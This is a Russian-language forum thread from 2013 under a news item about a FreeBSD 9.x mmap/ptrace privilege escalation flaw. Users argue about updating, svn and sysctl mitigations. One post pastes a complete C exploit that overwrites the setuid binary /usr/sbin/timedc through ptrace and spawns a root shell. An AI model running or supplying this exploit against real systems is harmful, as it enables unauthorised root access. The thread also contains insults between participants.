URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 90487
[ Назад ]

Исходное сообщение
"Опасная локальная уязвимость в реализации mmap из состава Fr..."

Отправлено opennews , 18-Июн-13 23:54 
Во всех выпусках FreeBSD 9.x выявлена (http://lists.freebsd.org/pipermail/freebsd-announce/2013-Jun...) уязвимость в реализации виртуальной памяти, при успешной эксплуатации позволяющая локальному злоумышленнику повысить свои привилегии в системе. Для эксплуатации уязвимости атакующий должен иметь возможность выполнения произвольного кода с пользовательскими привилегиями. Проблема может привести к неавторизированной модификации произвольного файла к которому атакующий имеет доступ на чтение, но в обычных условиях не имеет доступа на запись.


Ошибка связана с отсутствием должных проверок доступа при трассировке приложений. В частности, процесс осуществляющий трассировку (например, отладчик) может получить права доступа к областям памяти трассируемого процесса, к которым у самого трассируемого процесса нет доступа (например, используя mmap для доступного только на чтение файла, можно получить доступ на запись к связанным с данным файлом областям памяти). Всем пользователям FreeBSD 9.x рекомендуется как можно скорее произвести обновление системы до   9.1-RELEASE-p4 или 9.1-STABLE.

URL: http://lists.freebsd.org/pipermail/freebsd-announce/2013-Jun...
Новость: http://www.opennet.me/opennews/art.shtml?num=37206


Содержание

Сообщения в этом обсуждении
"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Inome , 18-Июн-13 23:54 
эх, хорошо всё-таки, что не побежал обновляться до 9 :)

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено iZEN , 19-Июн-13 00:06 
Можно подумать, что это очень сложно.

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 01:54 
долго пересобирать, если нету ip-kvm то это IMPOSSIBRU!

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено 80е , 19-Июн-13 02:09 
>> если нету ip-kvm то это IMPOSSIBRU!

Если нету ip-kvm то НЕТУ И ЛОКАЛЬНЫХ ПОЛЬЗОВАТЕЛЕЙ ! :)  :) :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 04:00 
Ну да, а демоны у вас под какими пользователями работают? Сразу под рутом, чтобы хацкерам даже мучаться с дырками не надо было? :)

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено 80е , 19-Июн-13 05:15 
Вы читаете то, что комментируете?
Я имею ввиду описание уязвимости.

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 13:55 
> Я имею ввиду описание уязвимости.

Да, и там написано:

> Для эксплуатации уязвимости атакующий должен иметь возможность выполнения произвольного
> кода с пользовательскими привилегиями.

Для тех кто на бронепоезде (бсдшники, то-бишь), поясняю: локальный пользователь - только в том плане что это не ремотное поимение по сети, а "лишь" "локальным" кодом выполняемым на машине. А как именно залогинен пользователь, через KVM или там как демон какой-то - да пофигу скорее всего. А что, есть какая-то большая разница откуда трассировочные вызовы дергать? Очень сомнительно.

Хотя, если вам хочется публично лохануться, показав всему миру что вы дуб дубом и не понимаете что такое системные вызовы и как это работает - окей, nice try!


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено 80е , 20-Июн-13 05:30 
Вос-с-спидя...
От ты ты дурачок сельскохозяйственный...

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 20-Июн-13 15:34 
Да, наверное рассаду у вас лучше будет получаться выращивать. Самокритика засчитана.

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Andrey Mitrofanov , 19-Июн-13 10:28 
> Если нету ip-kvm

Ты пропустил:

"", нет запущенных сетевых сервисов, нет ключа от серверной, нет <...я.тоже.чего-то.пропустил...>

> то НЕТУ И ЛОКАЛЬНЫХ ПОЛЬЗОВАТЕЛЕЙ ! :)  :)  :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 13:56 
И главное - питание к серваку не подключать!

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено 80е , 20-Июн-13 06:34 
запущенный сетевой сервис — системный процесс, а не «локальный пользователь»?

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 20-Июн-13 15:35 
> запущенный сетевой сервис — системный процесс, а не «локальный пользователь»?

И чем он отличается в плане дергания сисколов от процессов "локального пользователя" к которому вы прикопались?


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено IMHO , 19-Июн-13 00:07 
хорошо что ее нашли и исправили, а там уже как хочешь так и обновляйся или нет, уязвимость то локальная

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено SubGun , 19-Июн-13 10:24 
Но может быть реализована через другую уязвимость.

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Нанобот , 19-Июн-13 10:48 
было б странно, если б нашли и не исправили

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 13:57 
> и обновляйся или нет, уязвимость то локальная

Ага, только это заканчивается тем что через вебню сначала хаксор просто вламывается и получает права пользователя. Потом апгрейдит их через что-то такое до рута. А потом ищи его свищи, когда там руткит половину сисколов переколбасил...


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено друг iZEN , 20-Июн-13 09:33 
да уж блиинннннн - ужас!!!! МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!, СМЕХ ДА И ТОЛЬКО

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Клыкастый , 20-Июн-13 10:28 
Думать что тебя не атакуют каждый день - это раздолбайство. Атакуют. Каждый день.

"Опасная локальная уязвимость в реализации mmap из..."
Отправлено arisu , 20-Июн-13 11:44 
> да уж блиинннннн - ужас!!!! МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!, СМЕХ
> ДА И ТОЛЬКО

если бы у тебя стояли хоть какие-то сервера на бсд и ты умел читать логи (я понимаю, что это два совершенно невероятных предположения), то ты узнал бы много интересного.


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 20-Июн-13 15:36 
> МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!

Если бы у тебя был сервер вывешенный в интернет и ты умел читать логи, ты бы узнал очень много интересного на этот счет.


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено IMHO , 19-Июн-13 00:06 
> Всем пользователям FreeBSD 9.x рекомендуется как можно скорее произвести обновление системы до 9.1-RELEASE-p4 или 9.1-STABLE.

спасибо, так и сделаю


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено FSA , 19-Июн-13 00:14 
Точно, пока ночь, надо машинку перезагрузить.

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено 80е , 19-Июн-13 03:14 
И где взять?

../release/9.1.0/ и ../releng/9.1/
и там, и там — МУСОР.

Как это уже было при переносе портов с CVS на SVN.
Ща та же красота в BASE :)
В SVN — мусор, в CVS — ТОЖЕ МУСОР :)

Получить -p4 низзя :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено kshetragia , 19-Июн-13 05:56 
freebsd-update? не?

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено 80е , 19-Июн-13 13:20 
>> freebsd-update? не?

да, но это НЕ ПОПС.

Хотелось бы сдуть древо /usr/src


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 13:58 
> Хотелось бы сдуть древо /usr/src

А что, rm у вас сломался? :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено тигар , 19-Июн-13 10:01 
releng/9.1
там не мусор, там код, если чо. и да, -p4. я проверил

r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) | 9 lines
Changed paths:
   M /releng/9.1/UPDATING
   M /releng/9.1/sys/conf/newvers.sh
   M /releng/9.1/sys/vm/vm_map.c

Fix a bug that allowed a tracing process (e.g. gdb) to write
to a memory-mapped file in the traced process's address space
even if neither the traced process nor the tracing process had
write access to that file.

Security:       CVE-2013-2171
Security:       FreeBSD-SA-13:06.mmap
Approved by:    so


p.s. а в base (head) запихали svn[lite] и вынесли cvs :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено 80е , 19-Июн-13 13:27 
> releng/9.1
> там не мусор, там код, если чо. и да, -p4. я проверил
> r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) |
> 9 lines
> Changed paths:
>    M /releng/9.1/UPDATING
>    M /releng/9.1/sys/conf/newvers.sh
>    M /releng/9.1/sys/vm/vm_map.c

И вы знаете, — Я В КУРСЕ :) :) :)
Осталось НЕ РУЧКАМИ сдуть эти изменения в /usr/src

А в SVN — именно МУ СОР
Ибо ни команда
svn co svn://svn.freebsd.org/base/releng/9.1/ /usr/src
ни команда
svn co svn://svn.freebsd.org/base/release/9.1.0/ /usr/src

набузыпив по мильену строк в /usr/src/.svn, — НЕ обновляют вот этих три
>    M /releng/9.1/UPDATING
>    M /releng/9.1/sys/conf/newvers.sh
>    M /releng/9.1/sys/vm/vm_map.c


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено тигар , 19-Июн-13 13:35 
>> releng/9.1
>> там не мусор, там код, если чо. и да, -p4. я проверил
>> r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) |
>> 9 lines
>> Changed paths:
>>    M /releng/9.1/UPDATING
>>    M /releng/9.1/sys/conf/newvers.sh
>>    M /releng/9.1/sys/vm/vm_map.c
> И вы знаете, — Я В КУРСЕ :) :) :)
> Осталось НЕ РУЧКАМИ сдуть эти изменения в /usr/src

ну, если вместо того, чтобы узнать о существовании update, ну и вообще научиться пользоваться vcs, тренировать пальцы набирая смайлики... то да, "мусор"
> А в SVN — именно МУ СОР
> Ибо ни команда
> svn co svn://svn.freebsd.org/base/releng/9.1/ /usr/src
> ни команда
> svn co svn://svn.freebsd.org/base/release/9.1.0/ /usr/src

особенно доставила вторая попытка "обновиться" до -p4 из release/9.1.0. что, на лыссяре нет хаутушек как работать с svn и это делает тебя грустной пандой ?



"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 04:04 
> Ошибка связана с отсутствием должных проверок доступа при трассировке
> приложений. В частности, процесс осуществляющий трассировку (например,
> отладчик) может получить права доступа к областям памяти трассируемого
> процесса, к которым у самого трассируемого процесса нет доступа

Феерично, чо. А у "лyноходов" даже в бyбунте обычной - тот кто не рут просто не может трейсить процессы, ибо постоянный источник проблем.

Вот как-то так и получается что ламерская бyбунта - секурнее пальцатой фрибзды. Чудеса, да? :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 06:23 
sysctl security.bsd.unprivileged_proc_debug=0 ы?

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено linux must __RIP__ , 19-Июн-13 08:26 
нельзя же так срезать :) недавно как раз в linux была дыра которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Andrey Mitrofanov , 19-Июн-13 10:22 
> нельзя же так срезать :) недавно как раз в linux была дыра
> которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через
> sysctl..

Нудк, теперь она есть и в твоей уютненькой.


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено BayaN , 19-Июн-13 11:42 
> Нудк, теперь она есть и в твоей уютненькой.

Портировали сволочи! И как всегда с опозданием.



"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 14:04 
> Портировали сволочи! И как всегда с опозданием.

Вопрос то не в портировании а в дефолтах. Вот ты при установке системы всегда прописываешь это? Нет? Тогда хренли толку с этого sysclt, если 90% обормотов которые пользуют BSD узнали о его существовании из этого поста? :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 14:01 
> нельзя же так срезать :) недавно как раз в linux была дыра
> которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..

Дядь, если ты не рут и пытаешься ptrace() - тебя просто сразу же и заворачивают. Совсем. Как это обойти то можно? :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 19-Июн-13 14:00 
> sysctl security.bsd.unprivileged_proc_debug=0 ы?

Только у бyбунтоидов и прочих это по дефолту. А у вас - думаете, нагуалы, тигары и прочие изены дотумкают это сделать без посторонней подсказки? Давайте поспорим что у них это не прописано и дырка эталонно работает, а? :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено тигар , 21-Июн-13 17:14 
на что спорить будем?

O.T. Мишенька, ты снова заболел, нельзя так, Шигорин.


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено ALex_hha , 19-Июн-13 12:08 
> нельзя же так срезать :) недавно как раз в linux была дыра которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..

вообще то легко лечилась правкой sysctl ;)

# sysctl kernel.perf_event_paranoid=2


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено whaddup , 19-Июн-13 12:09 
Вообще-то не лечилось.

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено anonymous , 19-Июн-13 14:19 
ну и где сейчас фря и где линукс?

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено zombardeer , 20-Июн-13 00:15 
на серверах. ну и лялих на дескттопах. немножко.

"Опасная локальная уязвимость в реализации mmap из..."
Отправлено arisu , 20-Июн-13 00:18 
> на серверах.

на всех четырёх!


"Опасная локальная уязвимость в реализации mmap из..."
Отправлено Фтщтнь , 20-Июн-13 01:45 
>> на серверах.
> на всех четырёх!

На 24х... Ну лично у меня. А у вас я не знаю как там. Собственно тонко подвожу вас к тому, что понимание происходящего в объективной реальности  ограничено исключительно вашими же представлениями о нем.


"Опасная локальная уязвимость в реализации mmap из..."
Отправлено arisu , 20-Июн-13 11:03 
а я намекаю, что по сравнению с пингвинусом разница между четырьмя, двадцатью четырьмя, двухсот сорока четырьмя — неразличима.

"Опасная локальная уязвимость в реализации mmap из..."
Отправлено andrew0snake , 20-Июн-13 20:49 
> а я намекаю, что по сравнению с пингвинусом разница между четырьмя, двадцатью
> четырьмя, двухсот сорока четырьмя — неразличима.

"двумястами сорока четырьмя" так-то) И вообще люди, что делают выбор в пользу использования (именно использования) Фряхи на серверах наверняка не только мониторят известия о найденых уязвимостях, но и не имеют проблем с sysctl'ами.


"Опасная локальная уязвимость в реализации mmap из..."
Отправлено arisu , 20-Июн-13 21:30 
> «двумястами сорока четырьмя» так-то)

да, виноват. с местными грамотеями уже и Ў скоро буду с тремя ошибками писать.


"Опасная локальная уязвимость в реализации mmap из..."
Отправлено Аноним , 20-Июн-13 22:47 
ЎX - новое обозначение для User eXperience :)

"Опасная локальная уязвимость в реализации mmap из..."
Отправлено Аноним , 20-Июн-13 15:37 
> На 24х... Ну лично у меня.

Думаете, ваши 24 сервака делают погоду на фоне миллионов? А большие конторы уже более-менее усвоили что жрать кактус смысла мало, при наличии более съедобных и удобных альтернатив.


"Опасная локальная уязвимость в реализации mmap из..."
Отправлено Фтщтнь , 20-Июн-13 15:50 
Отучаемся говорить за всех.

"Опасная локальная уязвимость в реализации mmap из..."
Отправлено Аноним , 20-Июн-13 23:02 
> Отучаемся говорить за всех.

А что - всех? За них статистика уже все сказала.


"Опасная локальная уязвимость в реализации mmap из..."
Отправлено Фтщтнь , 21-Июн-13 05:14 
>Миллионы мух не могут ошибаться

Простите, не удержался


"Опасная локальная уязвимость в реализации mmap из..."
Отправлено Led , 22-Июн-13 21:01 
>>Миллионы мух не могут ошибаться
> Простите, не удержался

А теперь на то, что ты "не удержался", слетится "миллионы мух". Родители не учили, что общественном месте нужно "удерживаться"?


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено ALex_hha , 20-Июн-13 12:21 
> Вообще-то не лечилось.

если руки кривые, то не лечилось ;)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено whaddup , 20-Июн-13 17:00 
У кого-то мозги кривые. Обход этой настройки требовал исправления всего 1 байта в исходном коде сплойта.

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено pavlinux , 20-Июн-13 13:24 

/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
*/

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
   int from_fd, to_fd, status;
   struct stat st;
   struct ptrace_io_desc piod;
   char *s, *d;
   pid_t pid;

   if (geteuid() == 0)  {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;
   }

   printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");

   if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
                err(1, "open");
if (stat(av[0], &st) == -1)
        err(2, "stat");

   if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
                (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                        MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                                err(3, "mmap");

   if ((pid = fork()) == -1)
        err(4, "fork");

   if (!pid) {
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
                err(5, "ptraceme");

        return 0;
        }

   if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(6, "ptattach");

   if (wait(&status) == -1)
        err(7, "wait");

   piod.piod_op = PIOD_WRITE_D;
   piod.piod_offs = d;
   piod.piod_addr = s;
   piod.piod_len  = st.st_size;

   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

   execl(TG, TG, NULL);

   return 0;
}



"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 20-Июн-13 15:38 
>  * Now you are 20 years old and your security is the same as 20 years ago... :)

Дожили, секурити фрибзды троллят даже в эксплойтах :)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено andrew0snake , 20-Июн-13 20:53 
>>  * Now you are 20 years old and your security is the same as 20 years ago... :)
> Дожили, секурити фрибзды троллят даже в эксплойтах :)

На то ж они и тролли, чтоб троллить, а не находить эти уязвимости. И тем более не устранять)


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено Аноним , 20-Июн-13 23:03 
> На то ж они и тролли, чтоб троллить, а не находить эти
> уязвимости. И тем более не устранять)

Для того чтобы констатировать что "жрачка-дрянь!" совершенно не обязательно иметь квалификацию шеф-повара.


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено тигар , 21-Июн-13 00:11 
>> На то ж они и тролли, чтоб троллить, а не находить эти
>> уязвимости. И тем более не устранять)
> Для того чтобы констатировать что "жрачка-дрянь!" совершенно не обязательно иметь квалификацию
> шеф-повара.

привыкшим жрать исключительно говно^W^W^Wпользоваться только линаксом (убунту?) совсем не обязательно видеть что-то отличное от, чтобы орать "жрачка-дрянь!" да.


"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено тигар , 21-Июн-13 00:09 
типичный луноход детектед. копирайты вырезаны, оригинальный линк не приведен. сделаю это за тебя, не благодари:
http://seclists.org/fulldisclosure/2013/Jun/161

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено тигар , 21-Июн-13 00:14 
и да, псто откуда ты с3.14здил эксплоит (а чо свой копирайт не поставил-то?;)) от 19го, а закрыли дыру 18го.

"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Отправлено StainlessRat , 25-Июн-13 21:25 
Всегда говорил: FreeBSD - Серверная платформа. Мастдай, и прочая хня - от лУКАВОГО. А локальная уязвимость... Так нех... пускать на сервер юзверей :)

"Опасная локальная"
Отправлено Andrey Mitrofanov , 25-Июн-13 21:50 
> Всегда говорил: FreeBSD
>Так нех... пускать на сервер юзверей :)

И IP соединеия снаружи. И соединеия *наружу*. И электричество из _сети_. </fbsd security>